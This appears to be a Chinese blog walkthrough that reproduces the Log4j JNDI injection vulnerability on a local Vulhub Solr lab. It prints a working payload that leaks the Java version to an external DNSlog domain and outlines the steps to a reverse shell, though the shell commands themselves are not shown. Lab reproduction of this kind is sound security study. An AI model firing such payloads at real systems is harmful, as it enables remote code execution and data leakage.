| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> 利用Vulhub复现log4j漏洞 -> 正文阅读 |
|
[系统运维]利用Vulhub复现log4j漏洞 |
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机:首先进入log4j路径
搭建环境
网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action=${jndi:ldap://${sys:java.version}.jkvl0r.dnslog.cn} 可以看到: 可以看到Java的版本被输出,测试具有漏洞 攻击:应用工具JNDI-Injection-Exploit搭建服务:格式:
?这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。 接下来要实现反弹shell,可以用命令
注意“命令”必须经过编码,不然将无法实现
得到结果: ?先打开控制端的监听:
使用bp payload ?成功反弹shell: |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/15 19:24:24- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |